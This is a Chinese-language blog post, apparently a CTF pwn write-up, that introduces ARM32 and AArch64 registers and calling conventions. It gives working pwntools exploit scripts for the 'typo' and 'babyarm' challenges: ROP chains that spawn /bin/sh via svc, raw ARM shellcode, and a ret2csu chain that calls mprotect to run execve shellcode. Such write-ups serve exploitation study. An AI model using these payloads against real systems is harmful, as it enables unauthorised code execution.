<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.22.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="arm初探">
<meta property="og:type" content="article">
<meta property="og:title" content="arm-初探">
<meta property="og:url" content="http://example.com/2023/11/13/arm-%E5%88%9D%E6%8E%A2/index.html">
<meta property="og:site_name" content="lianwu&#39;s blog">
<meta property="og:description" content="arm初探">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-11-13T15:45:20.000Z">
<meta property="article:modified_time" content="2023-11-14T14:11:46.524Z">
<meta property="article:author" content="lianwu">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="arm">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://example.com/2023/11/13/arm-%E5%88%9D%E6%8E%A2/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2023/11/13/arm-%E5%88%9D%E6%8E%A2/","path":"2023/11/13/arm-初探/","title":"arm-初探"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>arm-初探 | lianwu's blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">lianwu's blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%A2%84%E5%A4%87%E7%9F%A5%E8%AF%86"><span class="nav-number">1.</span> <span class="nav-text">预备知识</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#typo"><span class="nav-number">2.</span> <span class="nav-text">typo</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#aarch64"><span class="nav-number">3.</span> <span class="nav-text">aarch64</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#babyarm"><span class="nav-number">4.</span> <span class="nav-text">babyarm</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="lianwu"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">lianwu</p>
  <div class="site-description" itemprop="description">Betting the rest of your life on pwn.</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">32</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/11/13/arm-%E5%88%9D%E6%8E%A2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="lianwu">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="lianwu's blog">
      <meta itemprop="description" content="Betting the rest of your life on pwn.">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="arm-初探 | lianwu's blog">
      <meta itemprop="description" content="arm初探">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          arm-初探
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-11-13 23:45:20" itemprop="dateCreated datePublished" datetime="2023-11-13T23:45:20+08:00">2023-11-13</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-11-14 22:11:46" itemprop="dateModified" datetime="2023-11-14T22:11:46+08:00">2023-11-14</time>
    </span>

  
</div>

            <div class="post-description">arm初探</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p> 根据各位大师傅的博客搭好调试的环境</p>
<p>ARM32&#x3D;ARMv7</p>
<p>ARM64&#x3D;AARCH64&#x3D;ARMv8</p>
<h1 id="预备知识"><a href="#预备知识" class="headerlink" title="预备知识"></a>预备知识</h1><p>在arm中，调用函数是以<strong>r0~r3</strong>这四个寄存器为参数的，剩下的参数从右到左依次放入栈中，同时，函数返回值放在r0寄存器中。</p>
<p>arm中的b&#x2F;bl指令用来实现跳转，而pc寄存器相当于x86中的eip，保存下一条指令的地址。</p>
<p>在arm中gadget多是pop {xx,xx,xx,pc}以pc寄存器结尾的,至少本题是</p>
<p>对于ret2svc(arm中的arm)，r7类似于rax寄存器，存储函数调用号，svc指令类似于syscall，用于执行系统调用</p>
<h1 id="typo"><a href="#typo" class="headerlink" title="typo"></a>typo</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">from ownpwn.mypwn import *</span><br><span class="line">io=setup(&quot;./typo&quot;,arch=&quot;arm32&quot;)</span><br><span class="line">#shellcode=b&quot;\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x78\x46\x0a\x30\x01\x90\x01\xa9\x92\x1a\x0b\x27\x01\xdf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00&quot;</span><br><span class="line">system=0x000110B4</span><br><span class="line">binsh=0x0006C384</span><br><span class="line">p7=0x00014068</span><br><span class="line">p0_4=0x00020904</span><br><span class="line">p1=0x00068bec</span><br><span class="line">p4_7=0x00023dbc</span><br><span class="line">p3=0x00008160</span><br><span class="line">mov_2_4=0x0003338c</span><br><span class="line">svc=0x0000fed0</span><br><span class="line">payload=cyclic(112)+p32(p0_4)+p32(binsh)+p32(0)+p32(p1)+p32(0)+p32(p4_7)+p32(0)+p32(0xb)+p32(p3)+p32(svc)+p32(mov_2_4)</span><br><span class="line"></span><br><span class="line">&#x27;&#x27;&#x27;</span><br><span class="line">r0=/bin/sh</span><br><span class="line">r1=0</span><br><span class="line">r2=0</span><br><span class="line">r7=0xb</span><br><span class="line">mov_2_4;bl r3</span><br><span class="line">r3=svc</span><br><span class="line">&#x27;&#x27;&#x27;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#payload=cyclic(112)+p32(p0_4)+p32(binsh)*2+p32(system)</span><br><span class="line">sa(&quot;quit&quot;,&quot;\n&quot;)</span><br><span class="line">sa(&quot;------Begin------&quot;,payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h1 id="aarch64"><a href="#aarch64" class="headerlink" title="aarch64"></a>aarch64</h1><p>arm64的指令和寄存器等，与arm32多少有点出入</p>
<p>x0-x31为通用寄存器</p>
<p>x0-x7用于参数传递</p>
<p>x9-x15在子函数中，可直接使用这些寄存器，无需save&#x2F;restore</p>
<p>x19-x29在callee等子函数中使用这些，一般需要先save，在退出子函数时再resotre</p>
<p>x8，x16-x18，x29，x30是特殊用途的寄存器</p>
<p>x8相当于rax&#x2F;r7，用于存储函数返回值</p>
<p>x16-x16用于进程内临时寄存器</p>
<p>x18通常被保留给应用二进制接口（ABI）</p>
<p>x29类似于rbp寄存器，用于指向栈帧，即fp</p>
<p>X30 是链接寄存器，也就是存储返回地址的寄存器</p>
<p>SP寄存器则是类似于rsp寄存器，指向栈顶</p>
<p>PC类似于eip</p>
<h1 id="babyarm"><a href="#babyarm" class="headerlink" title="babyarm"></a>babyarm</h1><p>本题中没有pop的gadget，但可以利用arm64下的ret2csu</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">.text:00000000004008AC                               loc_4008AC                              ; CODE XREF: init+60↓j</span><br><span class="line">.text:00000000004008AC A3 7A 73 F8                   LDR             X3, [X21,X19,LSL#3]</span><br><span class="line">.text:00000000004008B0 E2 03 16 AA                   MOV             X2, X22</span><br><span class="line">.text:00000000004008B4 E1 03 17 AA                   MOV             X1, X23</span><br><span class="line">.text:00000000004008B8 E0 03 18 2A                   MOV             W0, W24</span><br><span class="line">.text:00000000004008BC 73 06 00 91                   ADD             X19, X19, #1</span><br><span class="line">.text:00000000004008C0 60 00 3F D6                   BLR             X3</span><br><span class="line">.text:00000000004008C0</span><br><span class="line">.text:00000000004008C4 7F 02 14 EB                   CMP             X19, X20</span><br><span class="line">.text:00000000004008C8 21 FF FF 54                   B.NE            loc_4008AC</span><br><span class="line">.text:00000000004008C8</span><br><span class="line">.text:00000000004008CC</span><br><span class="line">.text:00000000004008CC                               loc_4008CC                              ; CODE XREF: init+3C↑j</span><br><span class="line">.text:00000000004008CC F3 53 41 A9                   LDP             X19, X20, [SP,#var_s10]</span><br><span class="line">.text:00000000004008D0 F5 5B 42 A9                   LDP             X21, X22, [SP,#var_s20]</span><br><span class="line">.text:00000000004008D4 F7 63 43 A9                   LDP             X23, X24, [SP,#var_s30]</span><br><span class="line">.text:00000000004008D8 FD 7B C4 A8                   LDP             X29, X30, [SP+var_s0],#0x40</span><br><span class="line">.text:00000000004008DC C0 03 5F D6                   RET</span><br></pre></td></tr></table></figure>

<p>直接从栈上就可控制寄存器，控制寄存器执行mprotect，执行shellcode，注意要对齐，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/python</span><br><span class="line">from ownpwn.mypwn import *</span><br><span class="line">io=setup(&quot;./pwn&quot;,arch=&quot;arm64&quot;,arch_lib=&quot;/usr/aarch64-linux-gnu/&quot;,gdb_port=&quot;1234&quot;)</span><br><span class="line"></span><br><span class="line">csu_1=0x4008CC</span><br><span class="line">csu_2=0x4008AC</span><br><span class="line"></span><br><span class="line">mprotect_plt=0x400600</span><br><span class="line"></span><br><span class="line">shellcode=asm(shellcraft.execve(&quot;/bin/sh&quot;))</span><br><span class="line">offset=72</span><br><span class="line">payload1=p64(mprotect_plt)+shellcode</span><br><span class="line">sa(&quot;Name:&quot;,payload1)</span><br><span class="line"></span><br><span class="line">payload2=cyclic(offset)+p64(csu_1)+p64(0xdeadbeef)+p64(csu_2)+p64(0)+p64(1)+p64(0x411068)+p64(7)+p64(0x268)+p64(0x411000)+p64(0)+p64(0x411068+8)</span><br><span class="line"></span><br><span class="line">s(payload2)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/arm/" rel="tag"># arm</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/11/12/2022-%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2-smallcontainer/" rel="prev" title="2022-巅峰极客-smallcontainer">
                  <i class="fa fa-angle-left"></i> 2022-巅峰极客-smallcontainer
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/12/20/2023-qwbs7-warmup/" rel="next" title="2023-qwbs7-warmup">
                  2023-qwbs7-warmup <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">lianwu</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
